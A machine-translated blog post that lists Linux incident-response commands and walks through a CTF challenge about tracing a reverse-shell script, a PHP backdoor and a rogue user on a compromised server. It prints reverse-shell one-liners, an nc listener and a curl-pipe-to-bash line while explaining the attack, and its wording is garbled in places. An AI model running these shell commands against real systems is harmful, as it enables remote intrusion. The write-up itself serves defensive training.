From catf1ag two-hour AK match PWN/ATTACK killing summary to common command guide of emergency response

Tip: after the article is written, the directory can be generated automatically. Please refer to the help document on the right for how to generate it

preface

Recently, I read more than half of the books on the practical guide to network security emergency response technology (Qianxin). I just encountered the PWN problem of killing on the catf1ag platform. Make a problem-solving record and summarize the killing operation under the linux system.

Tip: the following is the main content of this article

1, Basic skills of emergency response under Linux system

1. System troubleshooting

(1) Basic system information

lscpu 	see cpu Relevant information, including model, main frequency and kernel
uname -a		View current operating system information
cat /proc/version 	View operating system version
lsmod  View all module information loaded into the system

(2) User information

cat /etc/passwd 	View the user information. Each item is separated by a colon, indicating "user name", "password encryption" and "user" ID""User group ID""Notes user home directory default login shell",bin/bash Indicates that you can log in,sbin/nologin Indicates that you cannot log in
awk -F: '{if($3==0)print $1}' /etc/passwd	see UID Super user with 0
awk -F: 'length($2)==0 {print $1}' /etc/shadow	View air order account
lastb	View the login list showing user errors
lastlog	Last login information of all users in the system
last	User's recent login information( var/log/wtmp|btmp|utmp),wtmp Storage login succeeded, btmp Storage login failed, utmp Currently logging in

(3) Start item

cat /etc/init.d/rc.local	see init.d folder rc.local Document content
cat /etc/rc.local	see rc.local File content
ls -alt /etc/init.d	see init.d Details of all files under the folder

(4) Task plan

Task plans are generally located in/etc/cron*In such a file

crontab -l		Current task plan
crontab -u username -l	View a user's task plan
ls /etc/cron*	etc All task plan files in the directory
 There are usually the following folders containing tasks
/etc/crontab
/etc/cron.d/*
/etc/cron.daily/*
/etc/cron.hourly/*
/etc/cron.monthly/*
/etc/cron.weekly/*
/etc/anacrontab

2. Process troubleshooting

(1) Service troubleshooting

netstat	Analyze suspicious ports IP,example: netstat -antlp,netstat -ano etc.
ls -alt /proc/PID	View process ID Corresponding execution procedure
lsof -p PID 	View files opened by the process
kill -9 PID		Kill someone ID process
rm -rf filename	Delete a file if root The user can't delete it, and the description file is added i attribute
lsattr filename	View file properties
chattr -i filename	To remove a file i attribute
ps -ef | awk '{print}' | sort -n |uniq >1,ls /proc | sort -n | uniq>2,diff 1 2,View by hidden processes
chkconfig --list	View the services running on the system, 0-6 Indicates the level, which are single user mode, multi-user command line mode without network connection, multi-user command line mode with network connection, unavailable, multi-user mode with graphical interface, restart
top    View processes with high occupancy
ps     View process information, such as ps -ef etc.

(2) File trace troubleshooting

linux Common sensitive directories are/tmp Directory and command directory/usr/bin,/usr/sbin Often used as malware download directory or replaced directory
find	Find in the specified directory
-type b/d/c/p/l/f	Find block device, directory, character device, pipeline, symbolic connection, ordinary file
-mtime -n +n	Find files by file change time,-n express n Within days,+n express n Days ago
-atime -n +n	Find files by file access time
-ctime -n +n	Find files by file creation time
stat	View the creation time, modification time and access time of the file
chkrootkit	Check whether there is rootkit Backdoor program, if any infected Description system rear door detected


Example:
find / -atime 5 -name "*.php"(Find visits in five days.php Suffix file for)
find / -ctime 5 -name "*.sh"(New search within five days.sh Suffix file for)
find /catalogue -perm 777	View files with 777 permissions
stat test.php	see test.php File details
find / -name "*.php" | xargs egrep "assert|eval|exec|shell_exec|POST" 	lookup php file,In the content assert,eval Etc
ls -alt /bin	View the modification time of relevant system commands in the command directory
ls -alh /bin	Check the size of relevant files to determine whether they are replaced

(3) Log analysis

/var/log/wtmp	Record login, entry, exit, data exchange, shutdown and restart
/var/log/cron	Record log information related to scheduled tasks
/var/log/messages	Record the information and error log after system startup
/var/log/apache2/access.log	record Apache Access log
/var/log/auth.log	Record system authorization information
/var/log/secure	The account and password entered by most applications of the recorder and whether to log in or not
/var/log/faillog	Record unsuccessful login information
cat /var/log/secure |awk '/Accepted/{print $(NF-3}'|sort|uniq -c|awk '{print $2"="$1;}'	(Centos)Positioning how much IP Address brute force cracking root
grep "Accepted" /var/log/secure |awk '{print $1,$2,$3,$9,$11}'	View the date of successful login,user name,IP address


(5) Flow analysis

Flexible use of Wireshark

2, Detailed explanation of catf1ag# AK PWN

Title Content:

One day, the catf1ag platform received a remote login email. After communicating with the internal partners, it was found that they did not log in, so admin logged in to the server and found that it was invaded and implanted with the files and backdoor files of the regular rebound shell. Please enter the server to simulate and check the problem, find the files of the rebound shell, and find the remote login IP, Find out the connection password of php backdoor file and the new abnormal user.

The topic prompt is obvious. The server uses php to inject the shell back door. Generally, PHP rebound shell operation is

bash -i >& /dev/tcp/ip/port 0>&1

or

Bash - C "bash - I > & / dev / TCP / IP / port 0 > & 1" # bash - I > & / dev / TCP / attacker IP / attacker port 0 > & 1

Complete interpretation:

bash -i# produces a bash interactive environment
>&Combine the contents before and after the union symbol, and then redirect to the latter together.
/dev/tcp/ip/port lets the target host and the attacker IP Port port establishes a tcp connection.
0 > & 1 , combine standard input with standard output, and then redirect to the previous standard output.

Bash generates an interactive environment that combines the connection initiated by the local host and established with the port port port of the attacker (i.e. TCP port session connection), then redirects a TCP port session connection, finally combines the user's keyboard input with the user's standard output, and redirects it to a standard output again, that is, a bash rebound environment is obtained.

On the attacker:

nc -lvvp port

curl ip|bash

Log in to the server using the ssh command

Use the find command to find the PHP file first, find / -name "*.php" |xargs egrep "eval|POST"

Continue to use the find command to find sh suffix file, find / -name "*.sh" |xargs egrep "bash|dev|tcp"

 

Use cat /etc/passwd to find the user's information and find the hacker_v user

Get the final catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}

summary

Emergency response requires data collection, storage and retrieval capabilities, event discovery capabilities, event analysis capabilities, event research and judgment capabilities, event handling capabilities, and attack traceability capabilities. Make up another wave for the encounter of Window system

Tags: Web Development Linux Web Security

Posted by dewen on Fri, 13 May 2022 02:30:13 +0300